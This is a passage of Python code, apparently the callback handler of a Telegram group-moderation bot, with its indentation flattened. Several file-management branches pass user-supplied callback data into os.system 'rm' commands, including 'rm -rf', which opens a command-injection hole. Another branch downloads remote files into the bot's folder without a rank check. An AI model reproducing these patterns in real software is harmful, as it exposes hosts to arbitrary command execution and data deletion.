userID = callback_query.from_user.id
chatID = callback_query.message.chat.id
userFN = callback_query.from_user.first_name
title = callback_query.message.chat.title
message_id = callback_query.message.message_id
date = json.loads(callback_query.data)
group = redis.sismember("{}Nbot:groups".format(BOT_ID),chatID)
c = importlib.import_module("lang.arcmd")
r = importlib.import_module("lang.arreply")
if date[0] == "Cordertow":
rank = isrank(redis,userID,chatID)
if rank in ("sudo", "asudo", "sudos", "malk", "acreator", "creator", "owner"):
if redis.sismember("{}Nbot:{}:bans".format(BOT_ID,chatID),date[1]):
GetGprank = GPranks(date[1],chatID)
if GetGprank == "kicked":
Bot("unbanChatMember",{"chat_id":chatID,"user_id":date[1]})
redis.srem("{}Nbot:{}:bans".format(BOT_ID,chatID),date[1])
Bot("editMessageText",{"chat_id":chatID,"text":r.doneCO,"message_id":message_id,"disable_web_page_preview":True})
else:
Bot("editMessageText",{"chat_id":chatID,"text":r.ARdoneCO,"message_id":message_id,"disable_web_page_preview":True})
return False
if date[0] == "delBL":
Hash = date[1]
chat = date[3]
if redis.sismember("{}Nbot:groups".format(BOT_ID),chat):
redis.delete("{}Nbot:{}:{}".format(BOT_ID,chat,Hash))
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True})
if re.search("del(.*)replys$",date[0]):
if int(date[2]) != userID:
Bot("answerCallbackQuery",{"callback_query_id":callback_query.id,"text":r.notforyou,"show_alert":True})
return 0
t = date[0].replace("del","")
if date[1] != "kb":
redis.delete("{}Nbot:{}:{}".format(BOT_ID,date[1],t))
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
redis.delete("{}Nbot:{}:{}".format(BOT_ID,chatID,t))
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if re.search("del(.*)replysBOT",date[0]):
rank = isrank(redis,userID,chatID)
if rank == "sudo":
t = date[0].replace("del","")
t = t.replace("BOT","")
if date[1] != "kb":
redis.delete("{}Nbot:{}".format(BOT_ID,t))
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
redis.delete("{}Nbot:{}".format(BOT_ID,t))
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
Bot("answerCallbackQuery",{"callback_query_id":callback_query.id,"text":r.SudoOnle,"show_alert":True})
if date[0] == "delfromb":
Hash = date[1]
chat = date[3]
if redis.sismember("{}Nbot:groups".format(BOT_ID),chat):
if Hash == "blockanimations":
ID = callback_query.message.animation.file_id
redis.srem("{}Nbot:{}:{}".format(BOT_ID,chat,Hash),ID)
Bot("deleteMessage",{"chat_id":chatID,"message_id":message_id})
if Hash == "blockSTICKERs":
ID = callback_query.message.sticker.file_id
redis.srem("{}Nbot:{}:{}".format(BOT_ID,chat,Hash),ID)
Bot("deleteMessage",{"chat_id":chatID,"message_id":message_id})
if Hash == "blockphotos":
ID = callback_query.message.photo.file_id
redis.srem("{}Nbot:{}:{}".format(BOT_ID,chat,Hash),ID)
Bot("deleteMessage",{"chat_id":chatID,"message_id":message_id})
User_click = int((redis.get("{}Nbot:{}:floodClick".format(BOT_ID,userID)) or 1))
if User_click > 10:
BY = "<a href=\"tg://user?id={}\">{}</a>".format(userID,userFN)
Bot("sendMessage",{"chat_id":chatID,"text":r.banclick.format(BY),"disable_web_page_preview":True,"parse_mode":"html"})
redis.setex("{}Nbot:floodUsers:{}".format(BOT_ID,userID),60*2,"Ban")
redis.delete("{}Nbot:{}:floodClick".format(BOT_ID,userID))
if chatID == userID:
group = True
if group is True and int(date[2]) == userID and not redis.get("{}Nbot:floodUsers:{}".format(BOT_ID,userID)):
if date[0] == "delcheck":
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.notcertain, callback_data=json.dumps(["kickcheck","",userID])),InlineKeyboardButton(r.certain, callback_data=json.dumps(["certain","",userID]))]])
random.shuffle(reply_markup.inline_keyboard[0])
Bot("editMessageText",{"chat_id":chatID,"text":r.ucertain,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "certain":
Bot("restrictChatMember",{"chat_id": chatID,"user_id":userID,"can_send_messages": 1,"can_send_media_messages": 1,"can_send_other_messages": 1,"can_send_polls": 1,"can_change_info": 1,"can_add_web_page_previews": 1,"can_pin_messages": 1,})
T ="<a href=\"tg://user?id={}\">{}</a>".format(userID,Name(userFN))
Bot("editMessageText",{"chat_id":chatID,"text":r.unrestricted.format(T),"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
if date[0] == "kickcheck":
Bot("kickChatMember",{"chat_id":chatID,"user_id":userID})
T ="<a href=\"tg://user?id={}\">{}</a>".format(userID,Name(userFN))
crid = redis.get("{}Nbot:{}:creator".format(BOT_ID,chatID))
redis.sadd("{}Nbot:{}:bans".format(BOT_ID,chatID),userID)
reply_markup = InlineKeyboardMarkup([[InlineKeyboardButton(r.Corder, callback_data=json.dumps(["Cordertow",userID]))]])
Bot("editMessageText",{"chat_id":chatID,"text":r.bancheck.format(T),"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html","reply_markup":reply_markup})
if date[0] == "delF":
File = date[1]
os.system("rm ./files/"+File)
Bot("editMessageText",{"chat_id":chatID,"text":r.Delfile.format(File),"message_id":message_id,"parse_mode":"html","disable_web_page_preview":True})
if date[0] == "delFa":
os.system("rm -rf ./files/*")
Bot("editMessageText",{"chat_id":chatID,"text":r.Delfiles,"message_id":message_id,"parse_mode":"html","disable_web_page_preview":True})
if date[0] == "dlf":
File = date[1]
os.system("rm ./files/"+File)
url = "https://raw.githubusercontent.com/A3EK/AEK1-files/master/"+File
out = requests.get(url).text
f = open("./files/"+File,"w+")
f.write(out)
f.close()
Bot("editMessageText",{"chat_id":chatID,"text":r.Dua.format(File),"message_id":message_id,"parse_mode":"html","disable_web_page_preview":True})
if date[0] == "au":
File = date[1]
if redis.sismember("{}Nbot:botfiles".format(BOT_ID),File):
redis.srem("{}Nbot:botfiles".format(BOT_ID),File)
else:
redis.sadd("{}Nbot:botfiles".format(BOT_ID),File)
onlyfiles = [f for f in listdir("files") if isfile(join("files", f))]
filesR = redis.smembers("{}Nbot:botfiles".format(BOT_ID))
array = []
for f in onlyfiles:
if f in filesR:
s = r.true
else:
s = r.false
array.append([InlineKeyboardButton(f+" "+s,callback_data=json.dumps(["au",f,userID]))])
kb = InlineKeyboardMarkup(array)
Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":kb})
if date[0] == "twostepset":
get = date[1]
if get == "eq":
redis.hset("{}Nbot:bancheck:t".format(BOT_ID),chatID,"two")
tx = r.Ttwo
g= "two"
if get == "two":
redis.hdel("{}Nbot:bancheck:t".format(BOT_ID),chatID)
g= "eq"
tx = r.Teq
kb = InlineKeyboardMarkup([[InlineKeyboardButton(r.tset.format(tx),callback_data=json.dumps(["twostepset",g,userID]))]])
Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":kb})
if date[0] == "floodset":
get = date[1]
if get == "ban":
redis.hset("{}Nbot:floodset".format(BOT_ID),chatID,"res")
tx = r.Tres
g= "res"
if get == "res":
redis.hset("{}Nbot:floodset".format(BOT_ID),chatID,"ban")
g= "ban"
tx = r.Tban
kb = InlineKeyboardMarkup([[InlineKeyboardButton(r.fset.format(tx),callback_data=json.dumps(["floodset",g,userID]))]])
Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":kb})
if date[0] == "delmsgclick":
Bot("deleteMessage",{"chat_id":chatID,"message_id":message_id})
Bot("deleteMessage",{"chat_id":chatID,"message_id":callback_query.message.reply_to_message.message_id})
if date[0] == "ckGPs":
rank = isrank(redis,userID,chatID)
if rank == "sudo":
Bot("editMessageText",{"chat_id":chatID,"text":r.ckpr,"message_id":message_id,"parse_mode":"html","disable_web_page_preview":True})
IDS = redis.smembers("{}Nbot:groups".format(BOT_ID))
i = 0
for ID in IDS:
get = Bot("getChat",{"chat_id":ID})
if get["ok"] == False:
redis.srem("{}Nbot:groups".format(BOT_ID),ID)
redis.sadd("{}Nbot:disabledgroups".format(BOT_ID),ID)
NextDay_Date = datetime.datetime.today() + datetime.timedelta(days=1)
redis.hset("{}Nbot:disabledgroupsTIME".format(BOT_ID),ID,str(NextDay_Date))
i+=1
time.sleep(0.3)
pr = redis.scard("{}Nbot:privates".format(BOT_ID))
gp = redis.scard("{}Nbot:groups".format(BOT_ID))
Bot("editMessageText",{"chat_id":chatID,"text":r.showstats.format(gp,pr)+r.Dckg.format(i),"message_id":message_id,"parse_mode":"html","disable_web_page_preview":True})
else:
Bot("answerCallbackQuery",{"callback_query_id":callback_query.id,"text":r.SudoOnle,"show_alert":True})
if date[0] == "Chlang":
name = date[1]
redis.srem("{}Nbot:lang:ar".format(BOT_ID),chatID)
redis.srem("{}Nbot:lang:arem".format(BOT_ID),chatID)
redis.srem("{}Nbot:lang:en".format(BOT_ID),chatID)
redis.sadd("{}Nbot:lang:{}".format(BOT_ID,name),chatID)
Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":Clang(client, callback_query,redis,r)})
if date[0] == "ShowDateUser":
t = IDrank(redis,userID,chatID,r)
msgs = (redis.hget("{}Nbot:{}:msgs".format(BOT_ID,chatID),userID) or 0)
edits = (redis.hget("{}Nbot:{}:edits".format(BOT_ID,chatID),userID) or 0)
rate = int(msgs)*100/20000
age = getAge(userID,r)
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(Name(userFN),url="t.me/SoalfLove")],[InlineKeyboardButton(r.Rrank.format(t),url="t.me/SoalfLove")],[InlineKeyboardButton(r.Rmsgs.format(msgs),url="t.me/SoalfLove")],[InlineKeyboardButton(r.Rrate.format(str(rate)+"%"),url="t.me/SoalfLove")],[InlineKeyboardButton(r.Redits.format(edits),url="t.me/SoalfLove")],[InlineKeyboardButton(r.Rage.format(age),url="t.me/SoalfLove")]])
Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if re.search("ShowO",date[0]):
T = date[0].replace("ShowO","")
rank = isrank(redis,userID,chatID)
if T == "lock":
reply_markup = getOR(rank,r,userID)
tx = r.LockO
if T == "admin":
reply_markup = getOR(rank,r,userID)
tx = r.AdminO
if T == "owner":
reply_markup = getOR(rank,r,userID)
tx = r.OwnerO
if T == "creator":
reply_markup = getOR(rank,r,userID)
tx = r.CreatorO
if T == "sudos":
reply_markup = getOR(rank,r,userID)
tx = r.SudosO
if T == "sudo":
reply_markup = getOR(rank,r,userID)
tx = r.SudoO
Bot("editMessageText",{"chat_id":chatID,"text":tx,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "sendtogroups":
Bot("editMessageText",{"chat_id":chatID,"text":r.PRsendtoGP,"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
done,dont = Sendto(redis,callback_query,"groups")
Bot("editMessageText",{"chat_id":chatID,"text":r.DsendtoGP.format(done,dont),"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
redis.delete("{}Nbot:donesend".format(BOT_ID))
redis.delete("{}Nbot:dontsend".format(BOT_ID))
if date[0] == "sendtoprivates":
Bot("editMessageText",{"chat_id":chatID,"text":r.PRsendtoPR,"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
done,dont = Sendto(redis,callback_query,"privates")
Bot("editMessageText",{"chat_id":chatID,"text":r.DsendtoPR.format(done,dont),"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
redis.delete("{}Nbot:donesend".format(BOT_ID))
redis.delete("{}Nbot:dontsend".format(BOT_ID))
if date[0] == "fwdtogroups":
Bot("editMessageText",{"chat_id":chatID,"text":r.PRsendtoGP,"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
done,dont = fwdto(redis,callback_query,"groups")
Bot("editMessageText",{"chat_id":chatID,"text":r.DsendtoGP.format(done,dont),"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
redis.delete("{}Nbot:donesend".format(BOT_ID))
redis.delete("{}Nbot:dontsend".format(BOT_ID))
if date[0] == "fwdtoprivates":
Bot("editMessageText",{"chat_id":chatID,"text":r.PRsendtoPR,"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
done,dont = fwdto(redis,callback_query,"privates")
Bot("editMessageText",{"chat_id":chatID,"text":r.DsendtoPR.format(done,dont),"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
redis.delete("{}Nbot:donesend".format(BOT_ID))
redis.delete("{}Nbot:dontsend".format(BOT_ID))
if date[0] == "kickme-yes":
Bot("kickChatMember",{"chat_id":chatID,"user_id":userID})
Bot("unbanChatMember",{"chat_id":chatID,"user_id":userID})
Bot("editMessageText",{"chat_id":chatID,"text":r.Dkickme,"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
if date[0] == "kickme-no":
Bot("editMessageText",{"chat_id":chatID,"text":r.Nkickme,"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
if date[0] == "delfromb":
Hash = date[1]
if Hash == "blockanimations":
ID = callback_query.message.animation.file_id
redis.srem("{}Nbot:{}:{}".format(BOT_ID,chatID,Hash),ID)
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneUNblock,"message_id":message_id,"disable_web_page_preview":True})
if date[0] == "Blocklist":
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(c.STword,callback_data=json.dumps(["showBlocklist","",userID])),InlineKeyboardButton(c.STgifs,url="https://telegram.me/{}?start=showBlocklist={}={}={}".format(Botuser,chatID,userID,"blockanimations")),],[InlineKeyboardButton(c.STphoto,url="https://telegram.me/{}?start=showBlocklist={}={}={}".format(Botuser,chatID,userID,"blockphotos")),InlineKeyboardButton(c.STsticker,url="https://telegram.me/{}?start=showBlocklist={}={}={}".format(Botuser,chatID,userID,"blockSTICKERs")),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.blocklist.format(r.blocklist2,title),"message_id":message_id,"parse_mode":"html","reply_markup":reply_markup})
if date[0] == "replylist":
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(c.STword,callback_data=json.dumps(["showreplylist","",userID])),InlineKeyboardButton(c.STgifs,callback_data=json.dumps(["showGFreplylist","",userID])),],[InlineKeyboardButton(c.STvoice,callback_data=json.dumps(["showVOreplylist","",userID])),InlineKeyboardButton(c.STsticker,callback_data=json.dumps(["showSTreplylist","",userID])),],[InlineKeyboardButton("Mp3",callback_data=json.dumps(["showAUreplylist","",userID]))]])
Bot("editMessageText",{"chat_id":chatID,"text":r.blocklist.format(r.replylist,title),"message_id":message_id,"parse_mode":"html","reply_markup":reply_markup})
if date[0] == "replylistBOT":
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(c.STword,callback_data=json.dumps(["showreplylistBOT","",userID])),InlineKeyboardButton(c.STgifs,callback_data=json.dumps(["showGFreplylistBOT","",userID])),],[InlineKeyboardButton(c.STvoice,callback_data=json.dumps(["showVOreplylistBOT","",userID])),InlineKeyboardButton(c.STsticker,callback_data=json.dumps(["showSTreplylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.blocklist.format(r.replylistBot,title),"message_id":message_id,"parse_mode":"html","reply_markup":reply_markup})
if date[0] == "alllist":
reply_markup=InlineKeyboardMarkup(
[[InlineKeyboardButton(c.STbanall,callback_data=json.dumps(["showbanall","",userID]))
,InlineKeyboardButton(c.STtkall,callback_data=json.dumps(["showtkall","",userID])),]
])
Bot("editMessageText",{"chat_id":chatID,"text":r.banlist,"message_id":message_id,"parse_mode":"html","reply_markup":reply_markup})
if date[0] == "delallban":
redis.delete("{}Nbot:bans".format(BOT_ID))
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["alllist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Ddelbanall,"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html","reply_markup":reply_markup})
if date[0] == "delalltk":
redis.delete("{}Nbot:restricteds".format(BOT_ID))
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["alllist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Ddeltkall,"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html","reply_markup":reply_markup})
if date[0] == "showBlocklist":
li = redis.smembers("{}Nbot:{}:blockTEXTs".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - "+word
i += 1
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.BlocklistRm,callback_data=json.dumps(["delListblockTEXTs","",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["Blocklist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["Blocklist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.BlocklistEm,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showbanall":
arrays = redis.smembers("{}Nbot:bans".format(BOT_ID))
if arrays:
b = BYusers(arrays,chatID,redis,client)
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.allbandel,callback_data=json.dumps(["delallban","",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["alllist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":b,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup,"parse_mode":"markdown"})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["alllist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.allbanE,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showtkall":
arrays = redis.smembers("{}Nbot:restricteds".format(BOT_ID))
if arrays:
b = BYusers(arrays,chatID,redis,client)
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.alltkdel,callback_data=json.dumps(["delalltk","",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["alllist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":b,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup,"parse_mode":"markdown"})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["alllist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.alltkE,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showreplylist":
li = redis.hkeys("{}Nbot:{}:TXreplys".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.clickTOpv,url="https://telegram.me/{}?start=showreplylist={}={}={}".format(Botuser,chatID,userID,"TXreplys")),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Toolong,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.replylistRm,callback_data=json.dumps(["delTXreplys","kb",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.replylistEm,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showAUreplylist":
li = redis.hkeys("{}Nbot:{}:AUreplys".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.clickTOpv,url="https://telegram.me/{}?start=showreplylist={}={}={}".format(Botuser,chatID,userID,"AUreplys")),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Toolong,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("📂꒐ قائمة الصوتيات فارغة",callback_data=json.dumps(["delSTreplys","kb",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":"📂꒐ قائمة الصوتيات فارغة","message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showSTreplylist":
li = redis.hkeys("{}Nbot:{}:STreplys".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.clickTOpv,url="https://telegram.me/{}?start=showreplylist={}={}={}".format(Botuser,chatID,userID,"STreplys")),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Toolong,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.STreplylistRm,callback_data=json.dumps(["delSTreplys","kb",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.STreplylistEm,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showGFreplylist":
li = redis.hkeys("{}Nbot:{}:GFreplys".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.clickTOpv,url="https://telegram.me/{}?start=showreplylist={}={}={}".format(Botuser,chatID,userID,"GFreplys")),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Toolong,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.GFreplylistRm,callback_data=json.dumps(["delGFreplys","kb",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.GFreplylistEm,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showVOreplylist":
li = redis.hkeys("{}Nbot:{}:VOreplys".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.clickTOpv,url="https://telegram.me/{}?start=showreplylist={}={}={}".format(Botuser,chatID,userID,"VOreplys")),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Toolong,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.VOreplylistRm,callback_data=json.dumps(["delVOreplys","kb",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.VOreplylistEm,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showreplylistBOT":
li = redis.hkeys("{}Nbot:TXreplys".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.clickTOpv,url="https://telegram.me/{}?start=showreplylistBOT={}={}={}".format(Botuser,chatID,userID,"TXreplys")),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Toolong,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.replylistRm,callback_data=json.dumps(["delTXreplysBOT","kb",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.replylistEm,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showSTreplylistBOT":
li = redis.hkeys("{}Nbot:STreplys".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.clickTOpv,url="https://telegram.me/{}?start=showreplylistBOT={}={}={}".format(Botuser,chatID,userID,"STreplys")),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Toolong,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.STreplylistRm,callback_data=json.dumps(["delSTreplysBOT","kb",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.STreplylistEm,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showGFreplylistBOT":
li = redis.hkeys("{}Nbot:GFreplys".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.clickTOpv,url="https://telegram.me/{}?start=showreplylistBOT={}={}={}".format(Botuser,chatID,userID,"GFreplys")),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Toolong,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.GFreplylistRm,callback_data=json.dumps(["delGFreplysBOT","kb",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.GFreplylistEm,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showVOreplylistBOT":
li = redis.hkeys("{}Nbot:VOreplys".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Botuser = client.get_me().username
